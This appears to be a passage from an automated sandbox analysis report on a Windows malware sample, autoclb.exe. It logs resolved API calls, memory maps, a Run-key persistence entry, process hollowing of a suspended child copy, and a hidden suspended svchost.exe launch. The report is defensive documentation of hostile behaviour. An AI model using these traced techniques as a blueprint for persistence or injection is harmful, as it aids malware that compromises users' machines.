Fn
Get Address - function = GlobalUnlock, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = HeapAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrcpyA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetLastError, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = HeapFree, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RemoveDirectoryA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = DeleteFileA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrcatA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = WriteFile, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateDirectoryA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = HeapDestroy, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = HeapCreate, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = SetEvent, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = HeapReAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetTickCount, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FindNextFileW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CopyFileW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = SetWaitableTimer, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = LocalAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetCurrentThread, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetCurrentThreadId, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrlenW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateEventA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetWindowsDirectoryA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = DeleteFileW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateDirectoryW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateWaitableTimerA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetTempPathA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FindFirstFileW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = LocalFree, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = TerminateProcess, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = SuspendThread, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = WaitForMultipleObjects, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ResumeThread, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrcpyW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FileTimeToSystemTime, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateThread, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateFileW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ResetEvent, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = SwitchToThread, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrcatW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateProcessW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetFileSize, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetFileAttributesW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = WideCharToMultiByte, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = LeaveCriticalSection, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = SetLastError, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = EnterCriticalSection, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetComputerNameA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateMutexA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = OpenWaitableTimerA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = OpenMutexA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetVolumeInformationA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = WaitForSingleObject, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ReleaseMutex, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetComputerNameW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = InitializeCriticalSection, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = LoadLibraryExW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = VirtualFree, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetFileAttributesA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = OpenFileMappingA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetExitCodeProcess, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateProcessA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrcpynA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = LocalReAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = TlsAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = TlsGetValue, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = TlsSetValue, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = LoadLibraryW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetVersionExW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FreeLibrary, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ReadFile, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = SetFilePointer, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = Thread32First, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = QueueUserAPC, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = OpenThread, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = Thread32Next, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FindFirstFileA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FindNextFileA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ConnectNamedPipe, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetOverlappedResult, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CancelIo, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = DisconnectNamedPipe, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FlushFileBuffers, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CallNamedPipeA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateNamedPipeA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetSystemTime, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = WaitNamedPipeA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetCurrentProcessId, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = SleepEx, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = OpenEventA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrcmpiW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RaiseException, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetSystemInfo, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = Process32NextW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = Process32FirstW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = QueueUserWorkItem, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = FindClose, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetDriveTypeW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = VirtualProtectEx, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Process #9: autoclb.exe
47 0
»
Information Value
ID #9
File Name c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe
Command Line "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:14, Reason: Autostart
Unmonitor End Time: 00:03:20, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
»
Information Value
PID 0x5f0
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 4F8
0x 3EC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
locale.nls 0x001d0000 0x0028dfff Memory Mapped File r False False False -
private_0x0000000000290000 0x00290000 0x002cffff Private Memory rw True False False -
private_0x00000000002d0000 0x002d0000 0x002d0fff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x002e1fff Private Memory rwx True False False -
private_0x0000000000310000 0x00310000 0x0031ffff Private Memory rw True False False -
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory rw True False False -
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory rw True False False -
private_0x0000000000390000 0x00390000 0x003fefff Private Memory rwx True False False -
autoclb.exe 0x00400000 0x00512fff Memory Mapped File rwx True True False
...
private_0x0000000000520000 0x00520000 0x0061ffff Private Memory rw True False False -
private_0x0000000000650000 0x00650000 0x0074ffff Private Memory rw True False False -
pagefile_0x0000000000750000 0x00750000 0x008d7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000008e0000 0x008e0000 0x00a60fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000a70000 0x00a70000 0x01e6ffff Pagefile Backed Memory r True False False -
private_0x0000000001e70000 0x01e70000 0x01feffff Private Memory rw True False False -
private_0x0000000001e70000 0x01e70000 0x01f20fff Private Memory rwx True False False -
pagefile_0x0000000001f30000 0x01f30000 0x01fa0fff Pagefile Backed Memory rwx True False False -
private_0x0000000001fe0000 0x01fe0000 0x01feffff Private Memory rw True False False -
private_0x0000000001ff0000 0x01ff0000 0x02166fff Private Memory rw True False False -
private_0x0000000002170000 0x02170000 0x022e8fff Private Memory rw True False False -
wow64.dll 0x61eb0000 0x61efefff Memory Mapped File rwx False False False -
wow64cpu.dll 0x61f00000 0x61f07fff Memory Mapped File rwx False False False -
wow64win.dll 0x61f10000 0x61f82fff Memory Mapped File rwx False False False -
comctl32.dll 0x74900000 0x74991fff Memory Mapped File rwx False False False -
version.dll 0x749a0000 0x749a7fff Memory Mapped File rwx False False False -
apphelp.dll 0x749b0000 0x74a40fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74a50000 0x74aa8fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74ab0000 0x74ab9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74ac0000 0x74addfff Memory Mapped File rwx False False False -
sechost.dll 0x74ae0000 0x74b22fff Memory Mapped File rwx False False False -
combase.dll 0x74bb0000 0x74d69fff Memory Mapped File rwx False False False -
kernel32.dll 0x74d70000 0x74e5ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x75190000 0x751d3fff Memory Mapped File rwx False False False -
imm32.dll 0x751e0000 0x7520afff Memory Mapped File rwx False False False -
shell32.dll 0x75210000 0x765cefff Memory Mapped File rwx False False False -
shcore.dll 0x765d0000 0x7665cfff Memory Mapped File rwx False False False -
user32.dll 0x766f0000 0x7682ffff Memory Mapped File rwx False False False -
msctf.dll 0x76890000 0x769affff Memory Mapped File rwx False False False -
windows.storage.dll 0x76a50000 0x76f2cfff Memory Mapped File rwx False False False -
powrprof.dll 0x770a0000 0x770e3fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x770f0000 0x7719bfff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77200000 0x7720bfff Memory Mapped File rwx False False False -
profapi.dll 0x77340000 0x7734efff Memory Mapped File rwx False False False -
gdi32.dll 0x773b0000 0x774fcfff Memory Mapped File rwx False False False -
advapi32.dll 0x77510000 0x7758afff Memory Mapped File rwx False False False -
msvcrt.dll 0x77600000 0x776bdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x77830000 0x779a5fff Memory Mapped File rwx False False False -
ntdll.dll 0x779b0000 0x77b28fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff977f2ffff Private Memory r True False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
private_0x00007ff9780f2000 0x7ff9780f2000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (24)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 3
Fn
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 4
Fn
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 3
Fn
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 4
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 3
Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 4
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe os_pid = 0x51c, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Thread (3)
»
Operation Process Additional Information Success Count Logfile
Get Context c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x4f8 True 1
Fn
Set Context c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x4f8 True 1
Fn
Resume c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x4f8 True 1
Fn
Memory (2)
»
Operation Process Additional Information Success Count Logfile
Read C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe address = 0x7ffde008, size = 4 True 1
Fn
Data
Write C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe address = 0x7ffde008, size = 4 True 1
Fn
Data
Module (14)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74d70000 True 2
Fn
Get Filename - process_name = c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, size = 259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x74d8a330 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x74d87580 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x74d89910 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x74d8f400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x74d88b70 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x74d974f0 True 1
Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 1642368 True 1
Fn
Map - process_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 True 1
Fn
Map - process_name = c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1f30000 True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #10: autoclb.exe
99 0
»
Information Value
ID #10
File Name c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe
Command Line "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:20, Reason: Child Process
Unmonitor End Time: 00:03:28, Reason: Self Terminated
Monitor Duration 00:00:08
OS Process Information
»
Information Value
PID 0x51c
Parent PID 0x5f0 (c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 710
0x 58C
0x 2D0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x0000000000060000 0x00060000 0x0015ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory rw True False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory rw True False False -
locale.nls 0x00210000 0x002cdfff Memory Mapped File r False False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory rw True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory rw True False False -
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory rw True False False -
autoclb.exe 0x00400000 0x00512fff Memory Mapped File rwx True True False
...
pagefile_0x0000000000400000 0x00400000 0x00470fff Pagefile Backed Memory rwx True False False -
private_0x0000000000480000 0x00480000 0x0057ffff Private Memory rw True False False -
private_0x0000000000590000 0x00590000 0x0068ffff Private Memory rw True False False -
pagefile_0x0000000000690000 0x00690000 0x00817fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000820000 0x00820000 0x009a0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000009b0000 0x009b0000 0x01daffff Pagefile Backed Memory r True False False -
private_0x0000000001db0000 0x01db0000 0x01eaffff Private Memory rw True False False -
private_0x0000000001eb0000 0x01eb0000 0x023dffff Private Memory rw True False False -
sortdefault.nls 0x023e0000 0x02716fff Memory Mapped File r False False False -
private_0x0000000002720000 0x02720000 0x028e1fff Private Memory rw True False False -
pagefile_0x0000000002720000 0x02720000 0x02852fff Pagefile Backed Memory rwx True False False -
private_0x0000000002860000 0x02860000 0x02a21fff Private Memory rw True False False -
wow64.dll 0x61eb0000 0x61efefff Memory Mapped File rwx False False False -
wow64cpu.dll 0x61f00000 0x61f07fff Memory Mapped File rwx False False False -
wow64win.dll 0x61f10000 0x61f82fff Memory Mapped File rwx False False False -
devobj.dll 0x74a20000 0x74a40fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74a50000 0x74aa8fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74ab0000 0x74ab9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74ac0000 0x74addfff Memory Mapped File rwx False False False -
sechost.dll 0x74ae0000 0x74b22fff Memory Mapped File rwx False False False -
combase.dll 0x74bb0000 0x74d69fff Memory Mapped File rwx False False False -
kernel32.dll 0x74d70000 0x74e5ffff Memory Mapped File rwx False False False -
setupapi.dll 0x74e60000 0x75004fff Memory Mapped File rwx False False False -
crypt32.dll 0x75010000 0x75184fff Memory Mapped File rwx False False False -
shlwapi.dll 0x75190000 0x751d3fff Memory Mapped File rwx False False False -
imm32.dll 0x751e0000 0x7520afff Memory Mapped File rwx False False False -
shell32.dll 0x75210000 0x765cefff Memory Mapped File rwx False False False -
shcore.dll 0x765d0000 0x7665cfff Memory Mapped File rwx False False False -
user32.dll 0x766f0000 0x7682ffff Memory Mapped File rwx False False False -
msctf.dll 0x76890000 0x769affff Memory Mapped File rwx False False False -
windows.storage.dll 0x76a50000 0x76f2cfff Memory Mapped File rwx False False False -
msasn1.dll 0x76f30000 0x76f3dfff Memory Mapped File rwx False False False -
powrprof.dll 0x770a0000 0x770e3fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x770f0000 0x7719bfff Memory Mapped File rwx False False False -
wintrust.dll 0x771a0000 0x771e1fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77200000 0x7720bfff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x77210000 0x77245fff Memory Mapped File rwx False False False -
ole32.dll 0x77250000 0x77339fff Memory Mapped File rwx False False False -
profapi.dll 0x77340000 0x7734efff Memory Mapped File rwx False False False -
gdi32.dll 0x773b0000 0x774fcfff Memory Mapped File rwx False False False -
advapi32.dll 0x77510000 0x7758afff Memory Mapped File rwx False False False -
msvcrt.dll 0x77600000 0x776bdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x77830000 0x779a5fff Memory Mapped File rwx False False False -
ntdll.dll 0x779b0000 0x77b28fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff977f2ffff Private Memory r True False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
private_0x00007ff9780f2000 0x7ff9780f2000 0x7ffffffeffff Private Memory r True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #9: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x4f8 address = 0x400000, size = 462848 True 1
Fn
Modify Memory #9: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x4f8 address = 0x7ffde008, size = 4 True 1
Fn
Data
Modify Control Flow #9: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x4f8 os_tid = 0x710, address = 0x77a1aef0 True 1
Fn
Host Behavior
File (8)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\98F9CE91 desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Windows\system32\c_1252.nls desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 3
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw - False 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Registry (12)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_USERS - True 1
Fn
Open Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = cabilipc, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, type = REG_SZ True 1
Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Process (3)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\svchost.exe os_pid = 0x198, creation_flags = CREATE_SUSPENDED, CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
